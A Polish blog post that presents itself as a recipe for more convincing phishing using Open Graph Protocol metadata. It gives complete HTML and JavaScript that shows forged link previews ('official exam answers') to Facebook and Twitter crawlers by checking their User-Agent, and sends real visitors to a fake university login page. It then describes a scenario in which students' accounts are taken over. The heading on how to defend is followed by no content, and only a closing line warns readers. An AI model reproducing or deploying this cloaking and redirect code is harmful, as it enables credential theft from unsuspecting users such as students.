mbator.pl / OGP - łatwiejszy phishing już teraz!

OGP - łatwiejszy phishing już teraz!

OGP - łatwiejszy phishing już teraz!

Jak wykorzystać OGP, aby kampania phishingowa wyglądała bardziej wiarygodnie? Jak oszukać platformy społecznościowe prostym sprawdzeniem User-Agenta? Oto przepis na skuteczniejszy phishing!

Co to jest OGP?

OGP - Open Graph Protocol to standard opracowany przez Facebooka, który ułatwia integrację linków w interfejsach platform społecznościowych. Kiedy użytkownik udostępnia link, serwer danej platformy pobiera metadane ze strony docelowej i prezentuje je w spójny sposób, tak by wpis nie odbiegał wizualnie od reszty treści na stronie.

Dzięki temu możemy w prosty sposób manipulować tym, jak linki wyglądają na Facebooku, Twitterze czy Discordzie.

Jak to wykorzystać w phishingu?

Najprostsza metoda to użycie fałszywych metadanych OGP w kodzie HTML strony:

<!DOCTYPE html>
<html lang="pl">
<head>
    <meta property="og:title" content="Oficjalne odpowiedzi do kolokwium - Studenci 2024" />
    <meta property="og:description" content="Plik PDF z rozwiązaniami - dostępny tylko dla studentów" />
    <meta property="og:image" content="https://example.com/thumbnail.png" />
    <meta property="og:url" content="https://example.com/odpowiedzi_do_kolokwium.html" />
</head>
<body>
    <h1>Przekierowywanie...</h1>
    <script>
        if (navigator.userAgent.includes("facebookexternalhit") || navigator.userAgent.includes("Twitterbot")) {
            // Boty platform społecznościowych widzą podrobioną stronę
            document.write("Meta tagi załadowane");
        } else {
            // Prawdziwi użytkownicy są przekierowywani do fałszywej strony logowania
            window.location.href = "https://zaloguj-student-uniwersytet.com";
        }
    </script>
</body>
</html>

Jak to działa?

  1. Kiedy użytkownik udostępnia link na Facebooku czy Discordzie, boty tych platform pobierają metadane OGP.
  2. Wyświetlana karta udostępniania wygląda jak oficjalna, sugerując, że link prowadzi do wiarygodnej strony.
  3. Gdy rzeczywisty użytkownik kliknie w link, kod JavaScript przekierowuje go do fałszywej strony logowania.

Przykład ataku: „odpowiedzi do kolokwium”

Na jednej z grup studenckich ktoś udostępnił link do „odpowiedzi_do_kolokwium.html”, sugerując, że zawiera oficjalne odpowiedzi do zbliżającego się egzaminu.

Przykład posta

Studenci, spragnieni łatwych punktów, klikają w link, który przenosi ich na fałszywą stronę logowania do systemu uczelnianego. Po wpisaniu danych – ich konto zostaje przejęte.

Jak się przed tym bronić?


Podsumowanie: OGP to świetne narzędzie do budowania wiarygodnych linków, ale niestety może być również używane w atakach phishingowych. Warto mieć to na uwadze i nie klikać bezmyślnie w każdy link! 🔥